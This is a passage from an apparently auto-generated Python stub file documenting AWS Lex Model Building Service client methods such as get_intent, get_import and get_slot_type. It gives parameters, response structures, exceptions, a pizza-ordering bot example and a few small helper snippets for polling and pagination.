:param name: [REQUIRED]\nThe name of the bot to export.\n
:type version: string
:param version: [REQUIRED]\nThe version of the bot to export.\n
:type resourceType: string
:param resourceType: [REQUIRED]\nThe type of resource to export.\n
:type exportType: string
:param exportType: [REQUIRED]\nThe format of the exported data.\n
:rtype: dict
Returns
Response Syntax
{
'name': 'string',
'version': 'string',
'resourceType': 'BOT'|'INTENT'|'SLOT_TYPE',
'exportType': 'ALEXA_SKILLS_KIT'|'LEX',
'exportStatus': 'IN_PROGRESS'|'READY'|'FAILED',
'failureReason': 'string',
'url': 'string'
}
Response Structure
(dict) --
name (string) --
The name of the bot being exported.
version (string) --
The version of the bot being exported.
resourceType (string) --
The type of the exported resource.
exportType (string) --
The format of the exported data.
exportStatus (string) --
The status of the export.
IN_PROGRESS - The export is in progress.
READY - The export is complete.
FAILED - The export could not be completed.
failureReason (string) --
If status is FAILED , Amazon Lex provides the reason that it failed to export the resource.
url (string) --
An S3 pre-signed URL that provides the location of the exported resource. The exported resource is a ZIP archive that contains the exported resource in JSON format. The structure of the archive may change. Your code should not rely on the archive structure.
Exceptions
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
:return: {
'name': 'string',
'version': 'string',
'resourceType': 'BOT'|'INTENT'|'SLOT_TYPE',
'exportType': 'ALEXA_SKILLS_KIT'|'LEX',
'exportStatus': 'IN_PROGRESS'|'READY'|'FAILED',
'failureReason': 'string',
'url': 'string'
}
:returns:
IN_PROGRESS - The export is in progress.
READY - The export is complete.
FAILED - The export could not be completed.
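A caller usually branches on exportStatus before touching the pre-signed URL. A sketch (helper name and defaults are illustrative; assumes a boto3 client):

```python
def export_url(client, name, version, resource_type='BOT', export_type='LEX'):
    # Return the pre-signed download URL once the export is READY.
    # Returns None while the export is still IN_PROGRESS; raises on FAILED.
    response = client.get_export(name=name, version=version,
                                 resourceType=resource_type,
                                 exportType=export_type)
    status = response['exportStatus']
    if status == 'FAILED':
        raise RuntimeError(response.get('failureReason', 'export failed'))
    return response['url'] if status == 'READY' else None
```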
"""
pass
def get_import(importId=None):
"""
Gets information about an import job started with the StartImport operation.
See also: AWS API Documentation
Exceptions
:example: response = client.get_import(
importId='string'
)
:type importId: string
:param importId: [REQUIRED]\nThe identifier of the import job information to return.\n
:rtype: dict
Returns
Response Syntax
{
'name': 'string',
'resourceType': 'BOT'|'INTENT'|'SLOT_TYPE',
'mergeStrategy': 'OVERWRITE_LATEST'|'FAIL_ON_CONFLICT',
'importId': 'string',
'importStatus': 'IN_PROGRESS'|'COMPLETE'|'FAILED',
'failureReason': [
'string',
],
'createdDate': datetime(2015, 1, 1)
}
Response Structure
(dict) --
name (string) --
The name given to the import job.
resourceType (string) --
The type of resource imported.
mergeStrategy (string) --
The action taken when there was a conflict between an existing resource and a resource in the import file.
importId (string) --
The identifier for the specific import job.
importStatus (string) --
The status of the import job. If the status is FAILED , you can get the reason for the failure from the failureReason field.
failureReason (list) --
A string that describes why an import job failed to complete.
(string) --
createdDate (datetime) --
A timestamp for the date and time that the import job was created.
Exceptions
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
:return: {
'name': 'string',
'resourceType': 'BOT'|'INTENT'|'SLOT_TYPE',
'mergeStrategy': 'OVERWRITE_LATEST'|'FAIL_ON_CONFLICT',
'importId': 'string',
'importStatus': 'IN_PROGRESS'|'COMPLETE'|'FAILED',
'failureReason': [
'string',
],
'createdDate': datetime(2015, 1, 1)
}
:returns:
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
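Import jobs are asynchronous, so a common pattern is to poll until the status leaves IN_PROGRESS. A sketch (helper name and timing defaults are illustrative; assumes a boto3 client):

```python
import time

def wait_for_import(client, import_id, delay=5.0, max_attempts=24):
    # Poll get_import until the job leaves IN_PROGRESS, then return the
    # final response (importStatus will be COMPLETE or FAILED).
    for _ in range(max_attempts):
        response = client.get_import(importId=import_id)
        if response['importStatus'] != 'IN_PROGRESS':
            return response
        time.sleep(delay)
    raise TimeoutError('import %s is still IN_PROGRESS' % import_id)
```

On a FAILED result, the failureReason list in the returned response describes why the import did not complete.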
"""
pass
def get_intent(name=None, version=None):
"""
Returns information about an intent. In addition to the intent name, you must specify the intent version.
This operation requires permissions to perform the lex:GetIntent action.
See also: AWS API Documentation
Exceptions
Examples
This example shows how to get information about an intent.
Expected Output:
:example: response = client.get_intent(
name='string',
version='string'
)
:type name: string
:param name: [REQUIRED]\nThe name of the intent. The name is case sensitive.\n
:type version: string
:param version: [REQUIRED]\nThe version of the intent.\n
:rtype: dict
Returns
Response Syntax
{
'name': 'string',
'description': 'string',
'slots': [
{
'name': 'string',
'description': 'string',
'slotConstraint': 'Required'|'Optional',
'slotType': 'string',
'slotTypeVersion': 'string',
'valueElicitationPrompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'priority': 123,
'sampleUtterances': [
'string',
],
'responseCard': 'string',
'obfuscationSetting': 'NONE'|'DEFAULT_OBFUSCATION'
},
],
'sampleUtterances': [
'string',
],
'confirmationPrompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'rejectionStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
},
'followUpPrompt': {
'prompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'rejectionStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
}
},
'conclusionStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
},
'dialogCodeHook': {
'uri': 'string',
'messageVersion': 'string'
},
'fulfillmentActivity': {
'type': 'ReturnIntent'|'CodeHook',
'codeHook': {
'uri': 'string',
'messageVersion': 'string'
}
},
'parentIntentSignature': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'version': 'string',
'checksum': 'string'
}
Response Structure
(dict) --
name (string) --
The name of the intent.
description (string) --
A description of the intent.
slots (list) --
An array of intent slots configured for the intent.
(dict) --
Identifies the version of a specific slot.
name (string) --
The name of the slot.
description (string) --
A description of the slot.
slotConstraint (string) --
Specifies whether the slot is required or optional.
slotType (string) --
The type of the slot, either a custom slot type that you defined or one of the built-in slot types.
slotTypeVersion (string) --
The version of the slot type.
valueElicitationPrompt (dict) --
The prompt that Amazon Lex uses to elicit the slot value from the user.
messages (list) --
An array of objects, each of which provides a message string and its type. You can specify the message string in plain text or in Speech Synthesis Markup Language (SSML).
(dict) --
The message object that provides the message text and its type.
contentType (string) --
The content type of the message string.
content (string) --
The text of the message.
groupNumber (integer) --
Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.
maxAttempts (integer) --
The number of times to prompt the user for information.
responseCard (string) --
A response card. Amazon Lex uses this prompt at runtime, in the PostText API response. It substitutes session attributes and slot values for placeholders in the response card. For more information, see ex-resp-card .
priority (integer) --
Directs Amazon Lex in the order in which to elicit this slot value from the user. For example, if the intent has two slots with priorities 1 and 2, Amazon Lex first elicits a value for the slot with priority 1.
If multiple slots share the same priority, the order in which Amazon Lex elicits values is arbitrary.
sampleUtterances (list) --
If you know a specific pattern with which users might respond to an Amazon Lex request for a slot value, you can provide those utterances to improve accuracy. This is optional. In most cases, Amazon Lex is capable of understanding user utterances.
(string) --
responseCard (string) --
A set of possible responses for the slot type used by text-based clients. A user chooses an option from the response card, instead of using text to reply.
obfuscationSetting (string) --
Determines whether a slot is obfuscated in conversation logs and stored utterances. When you obfuscate a slot, the value is replaced by the slot name in curly braces ({}). For example, if the slot name is "full_name", obfuscated values are replaced with "{full_name}". For more information, see Slot Obfuscation .
sampleUtterances (list) --
An array of sample utterances configured for the intent.
(string) --
confirmationPrompt (dict) --
If defined in the bot, Amazon Lex uses this prompt to confirm the intent before fulfilling the user\'s request. For more information, see PutIntent .
messages (list) --
An array of objects, each of which provides a message string and its type. You can specify the message string in plain text or in Speech Synthesis Markup Language (SSML).
(dict) --
The message object that provides the message text and its type.
contentType (string) --
The content type of the message string.
content (string) --
The text of the message.
groupNumber (integer) --
Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.
maxAttempts (integer) --
The number of times to prompt the user for information.
responseCard (string) --
A response card. Amazon Lex uses this prompt at runtime, in the PostText API response. It substitutes session attributes and slot values for placeholders in the response card. For more information, see ex-resp-card .
rejectionStatement (dict) --
If the user answers "no" to the question defined in confirmationPrompt , Amazon Lex responds with this statement to acknowledge that the intent was canceled.
messages (list) --
A collection of message objects.
(dict) --
The message object that provides the message text and its type.
contentType (string) --
The content type of the message string.
content (string) --
The text of the message.
groupNumber (integer) --
Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.
responseCard (string) --
At runtime, if the client is using the PostText API, Amazon Lex includes the response card in the response. It substitutes all of the session attributes and slot values for placeholders in the response card.
followUpPrompt (dict) --
If defined in the bot, Amazon Lex uses this prompt to solicit additional user activity after the intent is fulfilled. For more information, see PutIntent .
prompt (dict) --
Prompts for information from the user.
messages (list) --
An array of objects, each of which provides a message string and its type. You can specify the message string in plain text or in Speech Synthesis Markup Language (SSML).
(dict) --
The message object that provides the message text and its type.
contentType (string) --
The content type of the message string.
content (string) --
The text of the message.
groupNumber (integer) --
Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.
maxAttempts (integer) --
The number of times to prompt the user for information.
responseCard (string) --
A response card. Amazon Lex uses this prompt at runtime, in the PostText API response. It substitutes session attributes and slot values for placeholders in the response card. For more information, see ex-resp-card .
rejectionStatement (dict) --
If the user answers "no" to the question defined in the prompt field, Amazon Lex responds with this statement to acknowledge that the intent was canceled.
messages (list) --
A collection of message objects.
(dict) --
The message object that provides the message text and its type.
contentType (string) --
The content type of the message string.
content (string) --
The text of the message.
groupNumber (integer) --
Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.
responseCard (string) --
At runtime, if the client is using the PostText API, Amazon Lex includes the response card in the response. It substitutes all of the session attributes and slot values for placeholders in the response card.
conclusionStatement (dict) --
After the Lambda function specified in the fulfillmentActivity element fulfills the intent, Amazon Lex conveys this statement to the user.
messages (list) --
A collection of message objects.
(dict) --
The message object that provides the message text and its type.
contentType (string) --
The content type of the message string.
content (string) --
The text of the message.
groupNumber (integer) --
Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.
responseCard (string) --
At runtime, if the client is using the PostText API, Amazon Lex includes the response card in the response. It substitutes all of the session attributes and slot values for placeholders in the response card.
dialogCodeHook (dict) --
If defined in the bot, Amazon Lex invokes this Lambda function for each user input. For more information, see PutIntent .
uri (string) --
The Amazon Resource Name (ARN) of the Lambda function.
messageVersion (string) --
The version of the request-response that you want Amazon Lex to use to invoke your Lambda function. For more information, see using-lambda .
fulfillmentActivity (dict) --
Describes how the intent is fulfilled. For more information, see PutIntent .
type (string) --
How the intent should be fulfilled, either by running a Lambda function or by returning the slot data to the client application.
codeHook (dict) --
A description of the Lambda function that is run to fulfill the intent.
uri (string) --
The Amazon Resource Name (ARN) of the Lambda function.
messageVersion (string) --
The version of the request-response that you want Amazon Lex to use to invoke your Lambda function. For more information, see using-lambda .
parentIntentSignature (string) --
A unique identifier for a built-in intent.
lastUpdatedDate (datetime) --
The date that the intent was updated. When you create a resource, the creation date and the last updated date are the same.
createdDate (datetime) --
The date that the intent was created.
version (string) --
The version of the intent.
checksum (string) --
Checksum of the intent.
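The checksum supports optimistic locking when updating an intent: retrieve the current definition, then pass its checksum back to the companion put_intent operation (documented elsewhere in this client) so the update is rejected if the intent changed in the meantime. A minimal sketch of that flow, using a hypothetical stand-in client so it can be exercised without AWS credentials:

```python
def update_intent_description(client, name, new_description):
    """Update an intent's description using checksum-based optimistic locking."""
    # Fetch the current $LATEST definition, including its checksum.
    current = client.get_intent(name=name, version='$LATEST')
    # Pass the checksum back; Amazon Lex rejects the update if the
    # intent was modified since we read it.
    return client.put_intent(
        name=name,
        description=new_description,
        checksum=current['checksum'],
        fulfillmentActivity=current['fulfillmentActivity'],
    )

# Hypothetical stand-in client, not the real boto3 client.
class FakeLexClient:
    def get_intent(self, name, version):
        return {'name': name, 'checksum': 'abc-123',
                'fulfillmentActivity': {'type': 'ReturnIntent'}}

    def put_intent(self, **kwargs):
        # Echo the request back with a fresh checksum.
        return dict(kwargs, checksum='def-456')

resp = update_intent_description(FakeLexClient(), 'DocOrderPizza',
                                 'Updated description.')
```

With the real client, a stale checksum raises a PreconditionFailedException instead of silently overwriting the other change.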
Exceptions
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
Examples
This example shows how to get information about an intent.
response = client.get_intent(
version='$LATEST',
name='DocOrderPizza',
)
print(response)
Expected Output:
{
'version': '$LATEST',
'name': 'DocOrderPizza',
'checksum': 'ca9bc13d-afc8-4706-bbaf-091f7a5935d6',
'conclusionStatement': {
'messages': [
{
'content': 'All right, I ordered you a {Crust} crust {Type} pizza with {Sauce} sauce.',
'contentType': 'PlainText',
},
{
'content': 'OK, your {Crust} crust {Type} pizza with {Sauce} sauce is on the way.',
'contentType': 'PlainText',
},
],
'responseCard': 'foo',
},
'confirmationPrompt': {
'maxAttempts': 1,
'messages': [
{
'content': 'Should I order your {Crust} crust {Type} pizza with {Sauce} sauce?',
'contentType': 'PlainText',
},
],
},
'createdDate': 1494359783.453,
'description': 'Order a pizza from a local pizzeria.',
'fulfillmentActivity': {
'type': 'ReturnIntent',
},
'lastUpdatedDate': 1494359783.453,
'rejectionStatement': {
'messages': [
{
'content': "Ok, I'll cancel your order.",
'contentType': 'PlainText',
},
{
'content': 'I cancelled your order.',
'contentType': 'PlainText',
},
],
},
'sampleUtterances': [
'Order me a pizza.',
'Order me a {Type} pizza.',
'I want a {Crust} crust {Type} pizza',
'I want a {Crust} crust {Type} pizza with {Sauce} sauce.',
],
'slots': [
{
'name': 'Type',
'description': 'The type of pizza to order.',
'priority': 1,
'sampleUtterances': [
'Get me a {Type} pizza.',
'A {Type} pizza please.',
"I'd like a {Type} pizza.",
],
'slotConstraint': 'Required',
'slotType': 'DocPizzaType',
'slotTypeVersion': '$LATEST',
'valueElicitationPrompt': {
'maxAttempts': 1,
'messages': [
{
'content': 'What type of pizza would you like?',
'contentType': 'PlainText',
},
{
'content': 'Vegie or cheese pizza?',
'contentType': 'PlainText',
},
{
'content': 'I can get you a vegie or a cheese pizza.',
'contentType': 'PlainText',
},
],
},
},
{
'name': 'Crust',
'description': 'The type of pizza crust to order.',
'priority': 2,
'sampleUtterances': [
'Make it a {Crust} crust.',
"I'd like a {Crust} crust.",
],
'slotConstraint': 'Required',
'slotType': 'DocPizzaCrustType',
'slotTypeVersion': '$LATEST',
'valueElicitationPrompt': {
'maxAttempts': 1,
'messages': [
{
'content': 'What type of crust would you like?',
'contentType': 'PlainText',
},
{
'content': 'Thick or thin crust?',
'contentType': 'PlainText',
},
],
},
},
{
'name': 'Sauce',
'description': 'The type of sauce to use on the pizza.',
'priority': 3,
'sampleUtterances': [
'Make it {Sauce} sauce.',
"I'd like {Sauce} sauce.",
],
'slotConstraint': 'Required',
'slotType': 'DocPizzaSauceType',
'slotTypeVersion': '$LATEST',
'valueElicitationPrompt': {
'maxAttempts': 1,
'messages': [
{
'content': 'White or red sauce?',
'contentType': 'PlainText',
},
{
'content': 'Garlic or tomato sauce?',
'contentType': 'PlainText',
},
],
},
},
],
'ResponseMetadata': {
'...': '...',
},
}
:return: {
'name': 'string',
'description': 'string',
'slots': [
{
'name': 'string',
'description': 'string',
'slotConstraint': 'Required'|'Optional',
'slotType': 'string',
'slotTypeVersion': 'string',
'valueElicitationPrompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'priority': 123,
'sampleUtterances': [
'string',
],
'responseCard': 'string',
'obfuscationSetting': 'NONE'|'DEFAULT_OBFUSCATION'
},
],
'sampleUtterances': [
'string',
],
'confirmationPrompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'rejectionStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
},
'followUpPrompt': {
'prompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'rejectionStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
}
},
'conclusionStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
},
'dialogCodeHook': {
'uri': 'string',
'messageVersion': 'string'
},
'fulfillmentActivity': {
'type': 'ReturnIntent'|'CodeHook',
'codeHook': {
'uri': 'string',
'messageVersion': 'string'
}
},
'parentIntentSignature': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'version': 'string',
'checksum': 'string'
}
:returns:
(string) --
"""
pass
def get_intent_versions(name=None, nextToken=None, maxResults=None):
"""
Gets information about all of the versions of an intent.
The GetIntentVersions operation returns an IntentMetadata object for each version of an intent. For example, if an intent has three numbered versions, the GetIntentVersions operation returns four IntentMetadata objects in the response, one for each numbered version and one for the $LATEST version.
The GetIntentVersions operation always returns at least one version, the $LATEST version.
This operation requires permissions for the lex:GetIntentVersions action.
See also: AWS API Documentation
Exceptions
:example: response = client.get_intent_versions(
name='string',
nextToken='string',
maxResults=123
)
:type name: string
:param name: [REQUIRED]\nThe name of the intent for which versions should be returned.\n
:type nextToken: string
:param nextToken: A pagination token for fetching the next page of intent versions. If the response to this call is truncated, Amazon Lex returns a pagination token in the response. To fetch the next page of versions, specify the pagination token in the next request.
:type maxResults: integer
:param maxResults: The maximum number of intent versions to return in the response. The default is 10.
:rtype: dict
Returns
Response Syntax
{
'intents': [
{
'name': 'string',
'description': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'version': 'string'
},
],
'nextToken': 'string'
}
Response Structure
(dict) --
intents (list) --
An array of IntentMetadata objects, one for each numbered version of the intent plus one for the $LATEST version.
(dict) --
Provides information about an intent.
name (string) --
The name of the intent.
description (string) --
A description of the intent.
lastUpdatedDate (datetime) --
The date that the intent was updated. When you create an intent, the creation date and last updated date are the same.
createdDate (datetime) --
The date that the intent was created.
version (string) --
The version of the intent.
nextToken (string) --
A pagination token for fetching the next page of intent versions. If the response to this call is truncated, Amazon Lex returns a pagination token in the response. To fetch the next page of versions, specify the pagination token in the next request.
Exceptions
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
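Because the response can be truncated, callers typically loop until no nextToken is returned. A sketch of that loop, with a hypothetical in-memory client standing in for the real one so the flow runs locally:

```python
def get_all_intent_versions(client, name):
    """Collect every version of an intent by following nextToken."""
    versions, token = [], None
    while True:
        kwargs = {'name': name, 'maxResults': 50}
        if token:
            kwargs['nextToken'] = token
        page = client.get_intent_versions(**kwargs)
        versions.extend(page['intents'])
        token = page.get('nextToken')
        if not token:  # no token means this was the last page
            return versions

# Hypothetical stand-in client that serves two pages.
class FakePagedClient:
    def get_intent_versions(self, name, maxResults, nextToken=None):
        if nextToken is None:
            return {'intents': [{'name': name, 'version': '$LATEST'}],
                    'nextToken': 'page-2'}
        return {'intents': [{'name': name, 'version': '1'}]}

all_versions = get_all_intent_versions(FakePagedClient(), 'DocOrderPizza')
```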
:return: {
'intents': [
{
'name': 'string',
'description': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'version': 'string'
},
],
'nextToken': 'string'
}
:returns:
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
"""
pass
def get_intents(nextToken=None, maxResults=None, nameContains=None):
"""
Returns intent information as follows:
If you specify the nameContains field, returns the $LATEST version of all intents that contain the specified string.
If you don't specify the nameContains field, returns information about the $LATEST version of all intents.
The operation requires permission for the lex:GetIntents action.
See also: AWS API Documentation
Exceptions
Examples
This example shows how to get a list of all of the intents in your account.
Expected Output:
:example: response = client.get_intents(
nextToken='string',
maxResults=123,
nameContains='string'
)
:type nextToken: string
:param nextToken: A pagination token that fetches the next page of intents. If the response to this API call is truncated, Amazon Lex returns a pagination token in the response. To fetch the next page of intents, specify the pagination token in the next request.
:type maxResults: integer
:param maxResults: The maximum number of intents to return in the response. The default is 10.
:type nameContains: string
:param nameContains: Substring to match in intent names. An intent will be returned if any part of its name matches the substring. For example, 'xyz' matches both 'xyzabc' and 'abcxyz.'
:rtype: dict
Returns
Response Syntax
{
'intents': [
{
'name': 'string',
'description': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'version': 'string'
},
],
'nextToken': 'string'
}
Response Structure
(dict) --
intents (list) --
An array of Intent objects. For more information, see PutBot .
(dict) --
Provides information about an intent.
name (string) --
The name of the intent.
description (string) --
A description of the intent.
lastUpdatedDate (datetime) --
The date that the intent was updated. When you create an intent, the creation date and last updated date are the same.
createdDate (datetime) --
The date that the intent was created.
version (string) --
The version of the intent.
nextToken (string) --
If the response is truncated, the response includes a pagination token that you can specify in your next request to fetch the next page of intents.
Exceptions
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
Examples
This example shows how to get a list of all of the intents in your account.
response = client.get_intents(
maxResults=10,
nextToken='',
)
print(response)
Expected Output:
{
'intents': [
{
'version': '$LATEST',
'name': 'DocOrderPizza',
'createdDate': 1494359783.453,
'description': 'Order a pizza from a local pizzeria.',
'lastUpdatedDate': 1494359783.453,
},
],
'ResponseMetadata': {
'...': '...',
},
}
:return: {
'intents': [
{
'name': 'string',
'description': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'version': 'string'
},
],
'nextToken': 'string'
}
:returns:
nextToken (string) -- A pagination token that fetches the next page of intents. If the response to this API call is truncated, Amazon Lex returns a pagination token in the response. To fetch the next page of intents, specify the pagination token in the next request.
maxResults (integer) -- The maximum number of intents to return in the response. The default is 10.
nameContains (string) -- Substring to match in intent names. An intent will be returned if any part of its name matches the substring. For example, "xyz" matches both "xyzabc" and "abcxyz."
"""
pass
def get_paginator(operation_name=None):
"""
Create a paginator for an operation.
:type operation_name: string
:param operation_name: The operation name. This is the same name\nas the method name on the client. For example, if the\nmethod name is create_foo, and you\'d normally invoke the\noperation as client.create_foo(**kwargs), if the\ncreate_foo operation can be paginated, you can use the\ncall client.get_paginator('create_foo').
:rtype: L{botocore.paginate.Paginator}
Returns
A paginator object.
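In practice this pairs with the list operations above, such as get_intents. Assuming GetIntents supports pagination, a sketch of walking every page (with hypothetical stand-in objects so the loop can be exercised without AWS):

```python
def list_all_intent_names(client):
    """Use a paginator to walk every page of get_intents."""
    paginator = client.get_paginator('get_intents')
    names = []
    for page in paginator.paginate(maxResults=10):
        names.extend(intent['name'] for intent in page['intents'])
    return names

# Hypothetical stand-ins for the real client and paginator.
class FakePaginator:
    def paginate(self, **kwargs):
        yield {'intents': [{'name': 'DocOrderPizza'}]}
        yield {'intents': [{'name': 'DocOrderDrink'}]}

class FakeClient:
    def get_paginator(self, operation_name):
        assert operation_name == 'get_intents'
        return FakePaginator()

names = list_all_intent_names(FakeClient())
```

The paginator handles nextToken bookkeeping internally, so the caller never touches pagination tokens.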
"""
pass
def get_slot_type(name=None, version=None):
"""
Returns information about a specific version of a slot type. In addition to specifying the slot type name, you must specify the slot type version.
This operation requires permissions for the lex:GetSlotType action.
See also: AWS API Documentation
Exceptions
Examples
This example shows how to get information about a slot type.
Expected Output:
:example: response = client.get_slot_type(
name='string',
version='string'
)
:type name: string
:param name: [REQUIRED]\nThe name of the slot type. The name is case sensitive.\n
:type version: string
:param version: [REQUIRED]\nThe version of the slot type.\n
:rtype: dict
ReturnsResponse Syntax
{
'name': 'string',
'description': 'string',
'enumerationValues': [
{
'value': 'string',
'synonyms': [
'string',
]
},
],
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'version': 'string',
'checksum': 'string',
'valueSelectionStrategy': 'ORIGINAL_VALUE'|'TOP_RESOLUTION',
'parentSlotTypeSignature': 'string',
'slotTypeConfigurations': [
{
'regexConfiguration': {
'pattern': 'string'
}
},
]
}
Response Structure
(dict) --
name (string) --
The name of the slot type.
description (string) --
A description of the slot type.
enumerationValues (list) --
A list of EnumerationValue objects that defines the values that the slot type can take.
(dict) --
Each slot type can have a set of values. Each enumeration value represents a value the slot type can take.
For example, a pizza ordering bot could have a slot type that specifies the type of crust that the pizza should have. The slot type could include the values
thick
thin
stuffed
value (string) --
The value of the slot type.
synonyms (list) --
Additional values related to the slot type value.
(string) --
lastUpdatedDate (datetime) --
The date that the slot type was updated. When you create a resource, the creation date and last update date are the same.
createdDate (datetime) --
The date that the slot type was created.
version (string) --
The version of the slot type.
checksum (string) --
Checksum of the $LATEST version of the slot type.
valueSelectionStrategy (string) --
The strategy that Amazon Lex uses to determine the value of the slot. For more information, see PutSlotType .
parentSlotTypeSignature (string) --
The built-in slot type used as a parent for the slot type.
slotTypeConfigurations (list) --
Configuration information that extends the parent built-in slot type.
(dict) --
Provides configuration information for a slot type.
regexConfiguration (dict) --
A regular expression used to validate the value of a slot.
pattern (string) --
A regular expression used to validate the value of a slot.
Use a standard regular expression. Amazon Lex supports the following characters in the regular expression:
A-Z, a-z
0-9
Unicode characters ("\u<Unicode>")
Represent Unicode characters with four digits, for example "\u0041" or "\u005A".
The following regular expression operators are not supported:
Infinite repeaters: *, +, or {x,} with no upper bound.
Wild card (.)
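These restrictions can be screened for client-side before calling put_slot_type. A rough, hypothetical pre-check (not Lex's actual validator; it only flags the operators listed above and ignores escaping and character classes):

```python
import re

def lex_regex_acceptable(pattern):
    """Heuristically flag regex operators Amazon Lex rejects in slot type patterns.

    This is a rough pre-check, not Lex's real validator: it does not
    account for escaped characters or operators inside character classes.
    """
    if '*' in pattern or '+' in pattern:  # infinite repeaters
        return False
    if re.search(r'\{\d+,\}', pattern):   # {x,} with no upper bound
        return False
    if '.' in pattern:                    # wildcard
        return False
    return True
```

For example, a bounded pattern such as '[A-Z]{3}[0-9]{4}' passes, while '[A-Z]+' is flagged for its infinite repeater.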
Exceptions
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
Examples
This example shows how to get information about a slot type.
response = client.get_slot_type(
version='$LATEST',
name='DocPizzaCrustType',
)
print(response)
Expected Output:
{
'version': '$LATEST',
'name': 'DocPizzaCrustType',
'checksum': '210b3d5a-90a3-4b22-ac7e-f50c2c71095f',
'createdDate': 1494359274.403,
'description': 'Available crust types',
'enumerationValues': [
{
'value': 'thick',
},
{
'value': 'thin',
},
],
'lastUpdatedDate': 1494359274.403,
'ResponseMetadata': {
'...': '...',
},
}
:return: {
'name': 'string',
'description': 'string',
'enumerationValues': [
{
'value': 'string',
'synonyms': [
'string',
]
},
],
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'version': 'string',
'checksum': 'string',
'valueSelectionStrategy': 'ORIGINAL_VALUE'|'TOP_RESOLUTION',
'parentSlotTypeSignature': 'string',
'slotTypeConfigurations': [
{
'regexConfiguration': {
'pattern': 'string'
}
},
]
}
:returns:
thick
thin
stuffed
"""
pass
def get_slot_type_versions(name=None, nextToken=None, maxResults=None):
"""
Gets information about all versions of a slot type.
The GetSlotTypeVersions operation returns a SlotTypeMetadata object for each version of a slot type. For example, if a slot type has three numbered versions, the GetSlotTypeVersions operation returns four SlotTypeMetadata objects in the response, one for each numbered version and one for the $LATEST version.
The GetSlotTypeVersions operation always returns at least one version, the $LATEST version.
This operation requires permissions for the lex:GetSlotTypeVersions action.
See also: AWS API Documentation
Exceptions
:example: response = client.get_slot_type_versions(
name='string',
nextToken='string',
maxResults=123
)
:type name: string
:param name: [REQUIRED]\nThe name of the slot type for which versions should be returned.\n
